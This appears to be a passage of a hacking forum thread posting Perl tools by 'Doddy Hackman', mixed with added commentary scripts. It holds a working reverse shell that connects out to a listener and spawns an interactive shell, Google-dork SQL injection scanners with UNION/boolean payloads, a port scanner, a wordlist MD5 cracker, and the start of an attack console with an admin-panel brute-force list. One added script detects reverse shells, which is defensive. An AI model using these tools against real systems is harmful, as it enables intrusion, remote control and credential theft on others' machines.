    # match the whole extension, so "pl" is not found inside some other name
    if ($_[0] =~/^py$/i) {
    $code  = "python";
    }
    elsif ($_[0] =~/^pl$/i) {
    $code = "perl";
    }
    elsif ($_[0] =~/^rb$/i) {
    $code = "ruby";
    }
    elsif ($_[0] =~/^php$/i) {
    $code = "php";
    }
    elsif ($_[0] =~/^txt$/i) {
    $code = "";
    }
    else {
    $code = "Yet";
    }
    return $code;
    }

    sub reload {
    print "\n\n[?] Enter for continue\n\n";
    <stdin>;
    menu();
    }



    sub savefile {
    mkdir("logs") unless -d "logs";   # the log directory is not created anywhere else
    open (SAVE,">>logs/".$_[0]);
    print SAVE $_[1]."\n";
    close SAVE;
    }

    sub openfile {

    my $r;

    open (FILE,$_[0]);
    @wor = <FILE>;
    close FILE;
    for(@wor) {
    $r.= $_;
    }
    return $r;
    }

    sub lleva {
    return $nave->post('http://pastebin.com/api_public.php',{ paste_code => $_[1],paste_name=> $_[0],paste_format=>$_[2],paste_expire_date=>'N',paste_private=>"public",submit=>'submit'})->content;
    }

    # ¿ The End ?
#386
Scripting / [Perl] Reverse Shell By Doddy
8 October 2011, 16:55
 Hi everyone.

Today I bring a simple reverse shell; in this version you can only connect to the server running netcat,
then it prints information depending on the operating system of whoever ran the script.
In version 0.2 I will add kernel detection and its possible exploit.

Code (perl):

#!/usr/bin/perl
#Reverse Shell 0.1
#By Doddy H

use strict;
use warnings;
use IO::Socket;   # re-exports Socket's PF_INET, SOCK_STREAM, sockaddr_in, inet_aton

print "\n== -- Reverse Shell 0.1 - Doddy H 2010 -- ==\n\n";

unless (@ARGV == 2) {
print "[Sintax] : $0 <host> <port>\n\n";
exit(1);
} else {
print "[+] Starting the connection\n";
print "[+] Enter in the system\n";
print "[+] Enjoy !!!\n\n";
conectar($ARGV[0],$ARGV[1]);
tipo();
}

sub conectar {
my ($host,$port) = @_;
my $addr = inet_aton($host) or die "[-] Cannot resolve $host\n";
socket(REVERSE, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die "[-] socket: $!\n";
connect(REVERSE, sockaddr_in($port,$addr)) or die "[-] connect: $!\n";
# Point the process's stdin/stdout/stderr at the socket: the shell spawned
# below inherits them, so it reads commands from and writes output to the
# listener (nc -lvp <port> on the other side).
open (STDIN,"<&REVERSE") or die "[-] dup stdin: $!\n";
open (STDOUT,">&REVERSE") or die "[-] dup stdout: $!\n";
open (STDERR,">&REVERSE") or die "[-] dup stderr: $!\n";
}

sub tipo {
print "\n[*] Reverse Shell Starting...\n\n";
if ($^O =~/Win32/i) {
infowin();
system("cmd.exe");
} else {
infolinux();
#root();
system("/bin/bash -i");   # absolute path; "bin/bash" only resolved when run from /
}
}

sub infowin {
print "[+] Domain Name : ".Win32::DomainName()."\n";
print "[+] OS Version : ".Win32::GetOSName()."\n";
print "[+] Username : ".Win32::LoginName()."\n\n\n";
}

sub infolinux {
print "[+] System information\n\n";
system("uname -a");
}

#The End
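
An added example, not part of the post above and not the author's code: the shell in that script talks to the listener because its standard descriptors were pointed at the socket, and on Linux that is visible from the outside, since /proc/<pid>/fd/0, 1 and 2 of the spawned shell all resolve to socket:[inode] instead of a tty or /dev/null. The script below scores a process from its command name and descriptor targets, runs that decision over constructed sample data so it works anywhere, and then walks a real /proc when one exists. The list of shell names it looks for is an assumption of the example.

```perl
#!/usr/bin/perl
# Added example (not from the original post): a reverse shell like the one above
# works by pointing the shell's stdin/stdout/stderr at a socket. On Linux that is
# visible from the outside: /proc/<pid>/fd/0, 1 and 2 all resolve to
# "socket:[<inode>]" instead of a tty or /dev/null.
use strict;
use warnings;

# Pure decision function so it can be exercised with constructed data:
# $comm is the process name, $fds a hashref fd-number => readlink target.
# Returns 0 (clean), 1 (some std fd on a socket) or 2 (all three on the same
# socket, the classic dup pattern). The shell names are an assumption.
sub looks_like_reverse_shell {
    my ($comm, $fds) = @_;
    return 0 unless $comm =~ /^(?:ba|z|da|a)?sh$|^cmd\.exe$/;
    my @std  = map { $fds->{$_} // '' } 0 .. 2;
    my @sock = grep { /^socket:\[\d+\]$/ } @std;
    return 0 unless @sock;
    my %uniq = map { ($_, 1) } @std;
    return (@sock == 3 && scalar(keys %uniq) == 1) ? 2 : 1;
}

# Walk /proc (Linux); processes we are not allowed to inspect are skipped.
sub scan_proc {
    my @hits;
    opendir(my $dh, '/proc') or return @hits;
    for my $pid (grep { /^\d+$/ } readdir $dh) {
        open(my $ch, '<', "/proc/$pid/comm") or next;
        chomp(my $comm = <$ch> // '');
        close $ch;
        my %fds;
        for my $n (0 .. 2) {
            my $target = readlink("/proc/$pid/fd/$n");
            $fds{$n} = $target if defined $target;
        }
        my $score = looks_like_reverse_shell($comm, \%fds);
        push @hits, { pid => $pid, comm => $comm, score => $score, fds => \%fds } if $score;
    }
    closedir $dh;
    return @hits;
}

# Constructed samples (not real process data) so the logic runs anywhere:
my %sample = (
    'bash, dup to socket' => ['bash', { 0 => 'socket:[31337]', 1 => 'socket:[31337]', 2 => 'socket:[31337]' }],
    'bash, on a tty'      => ['bash', { 0 => '/dev/pts/0', 1 => '/dev/pts/0', 2 => '/dev/pts/0' }],
    'sshd daemon'         => ['sshd', { 0 => '/dev/null', 1 => '/dev/null', 2 => '/dev/null' }],
);
for my $name (sort keys %sample) {
    my ($comm, $fds) = @{ $sample{$name} };
    printf "%-22s score=%d\n", $name, looks_like_reverse_shell($comm, $fds);
}
for my $h (scan_proc()) {
    printf "[!] pid %s (%s) score=%d stdio: %s\n", $h->{pid}, $h->{comm}, $h->{score},
        join(', ', map { "$_=$h->{fds}{$_}" } sort keys %{ $h->{fds} });
}
```

Run it as root to see other users' descriptors; unprivileged it only inspects your own processes. A score of 2 is the exact footprint left by the three open(">&REVERSE") calls in the script above, and an interactive bash with score 2 that has no tty is worth a look on any box.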

#387
A simple SQLi scanner to use with Google

Code (perl):

#!/usr/bin/perl
#Search Google for scan SQLI
#(C) Doddy Hackman 2011

use strict;
use warnings;
use LWP::UserAgent;
use HTML::LinkExtor;

my $nave = LWP::UserAgent->new;
$nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12");
$nave->timeout(5);

head();

print "\n\n[Dork] : ";
chomp(my $dork = <STDIN>);
print "\n\n[Pages] : ";
chomp(my $pages = <STDIN>);
print "\n\n[Starting the search]\n\n";
my @links = google($dork,$pages);
print "\n[Links Found] : ".int(@links)."\n\n\n";
print "[Starting the scan]\n\n\n";
for my $link(@links) {
# keep the URL up to its last "=": the parameter value is what gets injected
if ($link=~/(.*)=/) {
sql($1."=");
}}
print "\n\n[+] Finish\n";
copyright();

sub google {
my($dork,$max) = @_;
my (@url,@founds);
for (my $start=10;$start<=$max;$start+=10) {
my $code = toma("http://www.google.com.ar/search?hl=&q=".$dork."&start=".$start);
for my $l (get_links($code)) {
push(@url,$l) if $l =~/webcache\.googleusercontent\.com/;
}
}
# the cache links carry the real target as cache:<id>:<url>+<terms>
for (@url) {
if ($_ =~/cache:(.*?):(.*?)\+/) {
push(@founds,$2);
}
}
return repes(@founds);
}

sub sql {
my ($pass1,$pass2) = ("+","--");
my $page = shift;
my $code1 = toma($page."-1".$pass1."union".$pass1."select".$pass1."666".$pass2);
# MySQL only prints this when the injected UNION actually reached the query
if ($code1=~/The used SELECT statements have a different number of columns/i) {
print "[+] SQLI : $page\a\n";
}}

sub get_links {
my @links;
# the callback receives (tag, attr => value, ...); every attribute value is a link
HTML::LinkExtor->new(sub { my ($tag,%attr) = @_; push(@links,values %attr); })->parse($_[0]);
return @links;
}

sub repes {
my %seen;
return grep { !$seen{$_}++ } @_;   # drop duplicates, keep the first occurrence
}

sub head {
print "\n\n-- == Search Google == --\n\n";
}

sub copyright {
print "\n\n(C) Doddy Hackman 2011\n\n";
exit(1);
}

sub toma {
return $nave->get($_[0])->content;
}

#Thanks to explorer (PerlEnEspañol)
# ¿ The End ?
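
An added example, not part of the post above and not the author's code: the scanner flags a URL only when MySQL prints the "different number of columns" error. The script below separates the decision from the fetching, so the same classifier can be run offline on constructed page bodies and then pointed at a live URL through LWP. It adds error signatures for other engines and a boolean check (the page for "and 1=1" should match the original while "and 1=0" should not). The extra signatures and the assumption that the injected parameter is the last one in the URL and already carries a value are mine, not from the post.

```perl
#!/usr/bin/perl
# Added example (not from the original post). The scanner above flags a URL only
# when MySQL prints the "different number of columns" error. This generalises the
# decision into a pure function over the four page bodies a scanner fetches, so
# it can be exercised offline on constructed responses and then plugged into LWP.
use strict;
use warnings;

# Error signatures for several engines; only the MySQL ones come from the post.
my @errors = (
    qr/You have an error in your SQL syntax/i,
    qr/The used SELECT statements have a different number of columns/i,
    qr/supplied argument is not a valid MySQL result resource/i,
    qr/mysql_(?:fetch_array|fetch_assoc|num_rows|query|free_result)\(\)/i,
    qr/Unclosed quotation mark after the character string/i,   # MSSQL
    qr/ORA-\d{5}/,                                            # Oracle
    qr/PostgreSQL.*ERROR|pg_query\(\)/i,                      # PostgreSQL
);

# $p = { base => body of the URL as is, quote => body with a trailing quote,
#        true => body with " and 1=1", false => body with " and 1=0" }
sub classify {
    my $p = shift;
    for my $re (@errors) {
        return 'error-based' if $p->{quote} =~ $re;
    }
    # Blind: an always-true condition leaves the page unchanged, an always-false one changes it.
    return 'boolean-based' if $p->{true} eq $p->{base} && $p->{false} ne $p->{base};
    return 'not vulnerable';
}

# Live probe. Assumes $url already carries a value for the injected parameter
# (e.g. ...?id=1) and that it is the last one, as in the scanner above.
sub probe_url {
    my $url = shift;
    require LWP::UserAgent;
    my $ua  = LWP::UserAgent->new(timeout => 5);
    my $get = sub { my $r = $ua->get($_[0]); $r->decoded_content // '' };
    return classify({
        base  => $get->($url),
        quote => $get->($url . "'"),
        true  => $get->($url . "+and+1=1"),
        false => $get->($url . "+and+1=0"),
    });
}

# Constructed responses (not captured from any real site):
my %cases = (
    'leaks errors'     => { base => 'Hello', quote => 'Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource', true => 'Hello', false => 'Hello' },
    'silent but blind' => { base => 'Hello', quote => 'Hello', true => 'Hello', false => '' },
    'static page'      => { base => 'Hello', quote => 'Hello', true => 'Hello', false => 'Hello' },
);
printf "%-18s %s\n", $_, classify($cases{$_}) for sort keys %cases;

printf "%s -> %s\n", $ARGV[0], probe_url($ARGV[0]) if @ARGV;
```

The three constructed cases come out as error-based, boolean-based and not vulnerable. The boolean branch compares whole bodies with eq, which is too strict for pages that embed timestamps or session tokens; in practice you would strip those or compare with a similarity threshold before trusting the result.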

#388
Scripting / [Perl] Scan Port By Doddy H
7 October 2011, 15:56
Hi everyone, here I bring you a simple port scanner
written in Perl

Code (perl):

#!/usr/bin/perl
#Scan Port
#(C) Doddy Hackman 2011

use strict;
use warnings;
use IO::Socket;

head();
unless($ARGV[0]) {
print "\n\n[sintax] : ".$0." <ip> \n\n";
} else {
scan($ARGV[0]);
}
copyright();

sub scan {

my $host = shift;

# Port -> service name. This is only the usual assignment; the scanner does
# not check what is really listening behind the port.
my %ports = ("21"=>"ftp",
"22"=>"ssh",
"25"=>"smtp",
"80"=>"http",
"110"=>"pop3",
"3306"=>"mysql"
);


print "\n[+] Scanning $host\n\n\n";

for my $port (sort { $a <=> $b } keys %ports) {

# a TCP connect completing within the timeout means the port is open
if (IO::Socket::INET->new(PeerAddr => $host,PeerPort => $port,Proto => "tcp",Timeout  => 0.5)) {
print "[Port] : ".$port." [Service] : ".$ports{$port}."\n";
}
}

}

sub head {
print "\n\n-- == Scan Port == --\n\n";
}

sub copyright {
print "\n\n(C) Doddy Hackman 2011\n\n";
exit(1);
}



Usage example:


perl scan.pl localhost
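
An added example, not part of the post above and not the author's code: the scanner labels a port from a fixed table, which says nothing about what is actually listening there. The script below does the same connect scan over a port range and then reads the banner, so the service is identified from what it says rather than from the port number; where the service waits for the client (HTTP) it sends a minimal request first. The banner patterns in guess_service and the sample banners printed at the start are constructed for the example.

```perl
#!/usr/bin/perl
# Added example (not from the original post): the scanner above labels a port by
# a fixed table, which says nothing about what is really listening. This does a
# connect scan over a range and reads the banner, so the service is identified
# from what it says rather than from the port number.
use strict;
use warnings;
use IO::Socket::INET;
use IO::Select;

$SIG{PIPE} = 'IGNORE';   # a peer that resets the connection must not kill us

# Returns undef if the port is closed/filtered, otherwise the (possibly empty)
# banner with non-printable bytes squashed.
sub grab_banner {
    my ($host, $port, $timeout) = @_;
    $timeout //= 1;
    my $sock = IO::Socket::INET->new(
        PeerAddr => $host, PeerPort => $port, Proto => 'tcp', Timeout => $timeout,
    ) or return;
    my $sel    = IO::Select->new($sock);
    my $banner = '';
    # Protocols like SSH, FTP and SMTP greet first; HTTP waits for the client.
    unless ($sel->can_read($timeout)) {
        print $sock "HEAD / HTTP/1.0\r\nHost: $host\r\n\r\n";
    }
    sysread($sock, $banner, 512) if $sel->can_read($timeout);
    close $sock;
    $banner =~ s/[^[:print:]]+/ /g;
    return $banner;
}

# Rough classification from the banner text, independent of the port number.
sub guess_service {
    my $banner = shift;
    return 'ssh'   if $banner =~ /^SSH-/;
    return 'http'  if $banner =~ /^HTTP\//;
    return 'ftp'   if $banner =~ /^220.*ftp/i;
    return 'smtp'  if $banner =~ /^220.*(?:smtp|esmtp)/i;
    return 'mysql' if $banner =~ /mysql_native_password|\d+\.\d+\.\d+-MariaDB/;
    return 'unknown';
}

sub scan {
    my ($host, $from, $to) = @_;
    my @open;
    for my $port ($from .. $to) {
        my $banner = grab_banner($host, $port, 0.5);
        next unless defined $banner;
        push @open, [$port, guess_service($banner), $banner];
    }
    return @open;
}

# Constructed banners (not captured from a real host) to show the classifier:
printf "%-6s %s\n", guess_service($_), $_ for (
    'SSH-2.0-OpenSSH_8.9p1', '220 mail.example ESMTP Postfix', 'HTTP/1.0 200 OK',
);

my ($host, $from, $to) = @ARGV;
if (defined $host) {
    $from //= 1; $to //= 1024;
    for my $r (scan($host, $from, $to)) {
        printf "[Port] : %-5d [Service] : %-8s %s\n", @$r;
    }
}
```

Usage: perl banner.pl localhost 1 1024. The scan is sequential with a half-second timeout per port, so a full range against a filtered host takes minutes; that is the price of keeping it simple, and the same IO::Select loop is the starting point if you want to fan out several connects at once.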
#389
Scripting / [Perl] Search MD5
7 October 2011, 15:56
Hi everyone

Today I just made an MD5 hash cracker, with or without salt
This version uses windows, built with Tk


Code (perl):
#Search MD5
#Version : Tk
#Author : Doddy Hackman


use Tk;
use Digest::MD5;
use Tk::FileSelect;
use Tk::ROText;

# Hide the console window on Windows. require runs at run time, inside the if;
# a "use" here would be compiled (and fail) on every other platform.
if ($^O eq 'MSWin32') {
require Win32::Console;
Win32::Console::Free();
}

my $w = MainWindow->new(-background=>"black");
$w->title("Search MD5");
$w->geometry("500x200+20+20");
$w->resizable(0,0);
$w->Label(-text=>"Search MD5",-background=>"black",-foreground=>"cyan",-font=>"Impact")->pack();
$w->Label(-text=>"Hash",-background=>"black",-foreground=>"green")->place(-x =>40, -y => 55);
my $hash = $w->Entry(-text=>"30d554c3665c8f204622b2003c77d994",-background=>"black",-foreground=>"green")->place(-x =>90, -y => 55);
$w->Label(-text=>"Salt",-background=>"black",-foreground=>"green")->place(-x =>260, -y => 55);
my $salt = $w->Entry(-text=>"X",-background=>"black",-foreground=>"green")->place(-x =>290, -y => 55);
$w->Label(-text=>"Wordlist",-background=>"black",-foreground=>"green")->place(-x =>40, -y => 100);
my $o = $w->Entry(-textvariable=>\$file,-background=>"black",-foreground=>"green")->place(-x =>90, -y => 100);
$w->Button(-text=>"Browse",-background=>"black",-foreground=>"red",-activebackground=>"red",-command=>\&oper)->place(-x =>230, -y => 100);
$w->Button(-text=>"Crack!",-foreground=>"green",-background=>"black",-command=>\&crack,-activebackground=>"green")->place(-x =>180, -y => 160);
$w->Button(-text=>"About",-foreground=>"green",-background=>"black",-command=>\&about,-activebackground=>"green")->place(-x =>240, -y => 160);
$w->Button(-text=>"Exit",-foreground=>"green",-background=>"black",-command=>[$w =>'destroy'],-activebackground=>"green")->place(-x =>300, -y => 160);

sub oper{
$w->update;
$browse = $w->FileSelect(-directory => "/");
my $file = $browse->Show;
$o->configure (-text =>$file);
}

sub about {
my $venta = MainWindow->new(-background=>"black");
$venta->geometry("300x180+20+20");
$venta->title("About");
$venta->resizable(0,0);
$venta->Label(-text=>"\nSearch MD5\n\n\nProgrammer : Doddy Hackman\n\nContact : lepuke[at]hotmail[com]\n\n",-background=>"black",-foreground=>"yellow")->pack();
$venta->Button(-text=>"Exit",-foreground=>"yellow",-background=>"black",-command => [$venta => 'destroy'],-activebackground=>'yellow')->pack()
}

sub crack {
my $h = lc $hash->get;       # md5_hex returns lowercase, so normalise the input
my $s = $salt->get;
my $wordlist = $o->get;

my $console = MainWindow->new(-background=>"black");
$console->title("Status");
$console->resizable(0,0);
$console->geometry("400x320+20+20");
$console->Label(-text=>"Status",-background=>"black",-foreground=>"green",-font=>"Impact")->pack();
my $box = $console->ROText(-background=>"black",-foreground=>"green",-width=> 45,-height=> 15)->place(-x =>40,-y=>50);
$console->Button(-text=>"Exit",-background=>"black",-foreground=>"green",-activebackground=>"green",-command=> [$console => 'destroy'],-width=>"20")->place(-x =>130, -y => 280);
if ($s eq "X") { $s = "";}
unless (-f $wordlist) { $box->insert('end',"\n\n[-] Wordlist dont exist!\n\n"); return; }
unless ($h =~ /^[0-9a-f]{32}$/) { $box->insert('end',"\n\n[-] The hash is incorrect\n\n"); return; }
$box->insert('end',"[Hash] : $h\n[Salt] : $s\n[Wordlist] : $wordlist\n\n");
open(my $wl,'<',$wordlist) or return;
my $ok = 0;
while (my $pass = <$wl>) {
chomp $pass;
$console->update;
$box->insert('end',"[+] Trying with $pass\n");
# md5_hex as a plain function: Digest::MD5->md5_hex($x) would hash the class
# name in front of $x. Compare with eq: == turns both hex strings into numbers
# and reports a false match.
my $digest = Digest::MD5::md5_hex($pass.$s);
if ($digest eq $h) {
print "\a\a";
$box->insert('end',"\n[Hash encoded] : $h\n[Hash decoded] : $pass\n\n");
$ok = 1;
last;
}
}
close $wl;
unless ($ok) { $box->insert('end',"\n\n[-] Sorry , hash not cracked\n\n"); }
}

MainLoop;


#390
Scripting / [Perl] Stalker By Doddy H
7 October 2011, 15:56
Well, here I bring you a program I have been
working on this past week

It is called Stalker; it serves as a console in case cmd.exe is not
available, and it has the following functions

  • Show the IP of a given server
  • Capture all the links on a page
  • List the processes on our machine
  • Kill a process that bothers us
  • Connect to a server and show its reply
  • Capture the HTTP methods of a web server
  • Check for directory listing on a page
  • Encode and decode hex/ascii/base64
  • Scan the ports of an IP
  • Search for the admin panel
  • Crack MD5 hashes via websites
  • Search Google for pages vulnerable to SQLi
  • FTP client
  • Browse our files and directories
  • And run commands


    Code (perl):
    #!/usr/bin/perl
    #Project STALKER (C) Doddy Hackman 2011
    #
    #ppm install http://www.bribes.org/perl/ppm/DBI.ppd
    #ppm install http://theoryx5.uwinnipeg.ca/ppms/DBD-mysql.ppd
    #
    #You need download this http://search.cpan.org/~animator/Color-Output-1.05/Output.pm
    #

    use IO::Socket;
    use HTML::LinkExtor;
    use LWP::UserAgent;
    use Win32::OLE qw(in);
    use Win32::Process;
    use Net::FTP;
    use Cwd;
    use URI::Split qw(uri_split);
    use MIME::Base64;
    use DBI;
    use Color::Output;
    Color::Output::Init;   # without the semicolon the @panels assignment below becomes Init's argument

    @panels=('admin/admin.asp','admin/login.asp','admin/index.asp','admin/admin.aspx'
    ,'admin/login.aspx','admin/index.aspx','admin/webmaster.asp','admin/webmaster.aspx'
    ,'asp/admin/index.asp','asp/admin/index.aspx','asp/admin/admin.asp','asp/admin/admin.aspx'
    ,'asp/admin/webmaster.asp','asp/admin/webmaster.aspx','admin/','login.asp','login.aspx'
    ,'admin.asp','admin.aspx','webmaster.aspx','webmaster.asp','login/index.asp','login/index.aspx'
    ,'login/login.asp','login/login.aspx','login/admin.asp','login/admin.aspx'
    ,'administracion/index.asp','administracion/index.aspx','administracion/login.asp'
    ,'administracion/login.aspx','administracion/webmaster.asp','administracion/webmaster.aspx'
    ,'administracion/admin.asp','administracion/admin.aspx','php/admin/','admin/admin.php'
    ,'admin/index.php','admin/login.php','admin/system.php','admin/ingresar.php'
    ,'admin/administrador.php','admin/default.php','administracion/','administracion/index.php'
    ,'administracion/login.php','administracion/ingresar.php','administracion/admin.php'
    ,'administration/','administration/index.php','administration/login.php'
    ,'administrator/index.php','administrator/login.php','administrator/system.php','system/'
    ,'system/login.php','admin.php','login.php','administrador.php','administration.php'
    ,'administrator.php','admin1.html','admin1.php','admin2.php','admin2.html','yonetim.php'
    ,'yonetim.html','yonetici.php','yonetici.html','adm/','admin/account.php','admin/account.html'
    ,'admin/index.html','admin/login.html','admin/home.php','admin/controlpanel.html'
    ,'admin/controlpanel.php','admin.html','admin/cp.php','admin/cp.html','cp.php','cp.html'
    ,'administrator/','administrator/index.html','administrator/login.html'
    ,'administrator/account.html','administrator/account.php','administrator.html','login.html'
    ,'modelsearch/login.php','moderator.php','moderator.html','moderator/login.php'
    ,'moderator/login.html','moderator/admin.php','moderator/admin.html','moderator/'
    ,'account.php','account.html','controlpanel/','controlpanel.php','controlpanel.html'
    ,'admincontrol.php','admincontrol.html','adminpanel.php','adminpanel.html','admin1.asp'
    ,'admin2.asp','yonetim.asp','yonetici.asp','admin/account.asp','admin/home.asp'
    ,'admin/controlpanel.asp','admin/cp.asp','cp.asp','administrator/index.asp'
    ,'administrator/login.asp','administrator/account.asp','administrator.asp'
    ,'modelsearch/login.asp','moderator.asp','moderator/login.asp','moderator/admin.asp'
    ,'account.asp','controlpanel.asp','admincontrol.asp','adminpanel.asp','fileadmin/'
    ,'fileadmin.php','fileadmin.asp','fileadmin.html','administration.html','sysadmin.php'
    ,'sysadmin.html','phpmyadmin/','myadmin/','sysadmin.asp','sysadmin/','ur-admin.asp'
    ,'ur-admin.php','ur-admin.html','ur-admin/','Server.php','Server.html'
    ,'Server.asp','Server/','wp-admin/','administr8.php','administr8.html'
    ,'administr8/','administr8.asp','webadmin/','webadmin.php','webadmin.asp'
    ,'webadmin.html','administratie/','admins/','admins.php','admins.asp'
    ,'admins.html','administrivia/','Database_Administration/','WebAdmin/'
    ,'useradmin/','sysadmins/','admin1/','system-administration/','administrators/'
    ,'pgadmin/','directadmin/','staradmin/','ServerAdministrator/','SysAdmin/'
    ,'administer/','LiveUser_Admin/','sys-admin/','typo3/','panel/','cpanel/'
    ,'cPanel/','cpanel_file/','platz_login/','rcLogin/','blogindex/','formslogin/
    ','autologin/','support_login/','meta_login/','manuallogin/','simpleLogin/
    ','loginflat/','utility_login/','showlogin/','memlogin/','members/','login-redirect/
    ','sub-login/','wp-login/','login1/','dir-login/','login_db/','xlogin/','smblogin/
    ','customer_login/','UserLogin/','login-us/','acct_login/','admin_area/','bigadmin/'
    ,'project-admins/','phppgadmin/','pureadmin/','sql-admin/','radmind/','openvpnadmin/'
    ,'wizmysqladmin/','vadmind/','ezsqliteadmin/','hpwebjetadmin/','newsadmin/','adminpro/'
    ,'Lotus_Domino_Admin/','bbadmin/','vmailadmin/','Indy_admin/','ccp14admin/'
    ,'irc-macadmin/','banneradmin/','sshadmin/','phpldapadmin/','macadmin/'
    ,'administratoraccounts/','admin4_account/','admin4_colon/','radmind-1/'
    ,'Super-Admin/','AdminTools/','cmsadmin/','SysAdmin2/','globes_admin/'
    ,'cadmins/','phpSQLiteAdmin/','navSiteAdmin/','server_admin_small/','logo_sysadmin/'
    ,'server/','database_administration/','power_user/','system_administration/'
    ,'ss_vms_admin_sm/');


    unless (-d "logs/webs") {   # relative to the working directory, not the filesystem root
    mkdir("logs",0777);
    mkdir("logs/webs",0777);
    }

    my $nave = LWP::UserAgent->new;
    $nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");
    $nave->timeout(5);

    head();

    getinfo();

    $SIG{INT} = \&next;

    while(1) {
    cprint "\x037"; #13
    menujo();
    cprint "\x030";
    }

    sub getinfo {
    $so = $^O;
    $login = Win32::LoginName();
    $domain = Win32::DomainName();
    cprint "\x0313"; #13
    print "\n\n[SO] : $so [Login] : $login [Group] : $domain\n\n";
    cprint "\x030";
    }


    sub menujo {
    print "\n\n>";
    chomp (my $cmd = <stdin>);
    print "\n\n";

    if ($cmd=~/getinfo/ig) {
    getinfo();
    }
    elsif ($cmd =~/getip (.*)/) {
    my $te = $1;
    if ($te eq "" or $te eq " ") {
    print "\n[+] sintax : getip <host>\n";
    }
    print "\n[IP] : ".getip($1)."\n";
    print "\n";
    }

    elsif ($cmd =~/getlink (.*)/) {
    print "[+] Extracting links in the page\n\n\n";
    $code = toma($1);
    my @re = get_links($code);
    for my $url(@re) {
    chomp $url;
    print "[Link] : $url\n";
    }
    print "\n\n[+] Finish\n";
    }

    elsif ($cmd=~/help/) {
    helpme();
    }

    elsif ($cmd=~/getprocess/) {
    my %re = getprocess();


    for my $data(keys %re) {
    print "[+] Proceso : ".$data."\n";
    print "[+] PID : ".$re{$data}."\n\n";
    }
    }
    elsif ($cmd=~/killprocess (.*) (.*)/) {
    if (killprocess($1,$2)) {
    print "[+] Process $1 closed";
    }
    }
    elsif ($cmd=~/conec (.*) (.*) (.*)/) {
    print conectar($1,$2,$3);
    }
    elsif ($cmd=~/allow (.*)/) {
    $re = conectar($1,"80","GET / HTTP/1.0\r\n");
    if ($re=~/Allow:(.*)/ig) {
    print "[+] Metodos : ".$1."\n";
    }}
    elsif ($cmd=~/paths (.*)/) {
    scanpaths($1);
    }
    elsif ($cmd=~/encodehex (.*)/) {
    print "\n\n[+] ".hex_en($1)."\n\n";
    }
    elsif ($cmd=~/decodehex (.*)/) {
    print "\n\n[+] ".hex_de($1)."\n\n";
    }
    elsif ($cmd=~/download (.*) (.*)/) {
    my ($file,$name) = ($1,$2);
    if (download($file,$name)) {
    print "[+] File downloaded\n";
    }
    }
    elsif ($cmd=~/encodeascii (.*)/) {
    print "\n\n[+] ".ascii($1)."\n\n";
    }
    elsif ($cmd=~/decodeascii (.*)/) {
    print "\n\n[+] ".ascii_de($1)."\n\n";
    }
    elsif ($cmd=~/encodebase (.*)/) {
    print "\n\n[+] ".base($1)."\n\n";
    }
    elsif ($cmd=~/decodebase (.*)/) {
    print "\n\n[+] ".base_de($1)."\n\n";
    }
    elsif ($cmd=~/aboutme/) {
    aboutme();
    }
    elsif ($cmd=~/scanport (.*)/) {
    scanport($1);
    }
    elsif ($cmd=~/panel (.*)/) {
    scanpanel($1);
    }
    elsif ($cmd=~/scangoogle/) {
    print "[Dork] : ";
    chomp(my $dork = <stdin>);
    print "\n\n[Pages] : ";
    chomp(my $pages = <stdin>);
    print "\n\n[Starting the search]\n\n";
    my @links = google($dork,$pages);
    print "\n[Links Found] : ".int(@links)."\n\n\n";
    print "[Starting the scan]\n\n\n";
    for my $link(@links) {
    if ($link=~/(.*)=/ig) {
    my $web = $1;
    sql($web."=");
    }}
    print "\n\n[+] Finish\n";
    }
    elsif ($cmd=~/getpass (.*)/) {
    crackit($1);
    }
    elsif ($cmd=~/ftp (.*) (.*) (.*)/) {
    ftp($1,$2,$3);
    }
    elsif ($cmd=~/navegator/) {
    nave:
    print getcwd().">";
    chomp(my $rta = <stdin>);
    print "\n\n";
    if ($rta=~/list/) {
    my @files = coleccionar(getcwd());
    for(@files) {
    if (-f $_) {
    print "[File] : ".$_."\n";
    } else {
    print "[Directory] : ".$_."\n";
    }}}
    if ($rta=~/cd (.*)/) {
    my $dir = $1;
    if (chdir($dir)) {
    print "\n[+] Directory changed\n";
    } else {
    print "\n[-] Error\n";
    }}
    if ($rta=~/del (.*)/) {
    my $file = getcwd()."/".$1;
    if (-f $file) {
    if (unlink($file)) {
    print "\n[+] File Deleted\n";
    } else {
    print "\n[-] Error\n";
    }
    } else {
    if (rmdir($file)) {
    print "\n[+] Directory Deleted\n";
    } else {
    print "\n[-] Error\n";
    }}}
    if ($rta=~/rename (.*) (.*)/) {
    if (rename(getcwd()."/".$1,getcwd()."/".$2)) {
    print "\n[+] File Changed\n";
    } else {
    print "\n[-] Error\n";
    }}
    if ($rta=~/open (.*)/) {
    my $file = $1;
    chomp $file;
    system($file);
    #system(getcwd()."/".$file);
    }
    if ($rta=~/help/) {
    print "\nCommands : help cd list del rename open exit\n\n";
    }
    if ($rta=~/exit/) {
    next;
    }
    print "\n\n";
    goto nave;
    }
    elsif ($cmd=~/kobra (.*)/) {
    my $url = $1;
    chomp $url;
    scansqli($url,"--");
    }
    elsif ($cmd=~/mysql (.*) (.*) (.*)/) {
    enter($1,$2,$3);
    }
    elsif ($cmd=~/exit/) {
    copyright();
    <stdin>;
    exit(1);
    }
    else {
    system($cmd);
    }
    #print "\n\n";
    }


    sub scansqli {
    print "[Status] : Scanning.....\n";
    $pass = &bypass($_[1]);
    my ($scheme, $auth, $path, $query, $frag)  = uri_split($_[0]);
    my $save = $auth;
    if ($_[0]=~/hackman/ig) {
    savefile($save.".txt","\n[Target Confirmed] : $_[0]\n");
    &menu_options($_[0],$pass,$save);
    }
    my ($gen,$save,$control) = &length($_[0],$_[1]);
    if ($control eq 1) {
    print "[Status] : Enjoy the menu\n\n";
    &menu_options($gen,$pass,$save);
    } else {
    print $control;
    print "[Status] : Length columns not found\n\n";
    menujo();
    }
    }

    sub length {
    my $rows  = "0";
    my $asc;
    my $page = $_[0];
    ($pass1,$pass2) = &bypass($_[1]);
    $inyection = $page.$pass1."and".$pass1."1=0".$pass1."order".$pass1."by".$pass1."9999999999".$pass2;
    $code = toma($inyection);
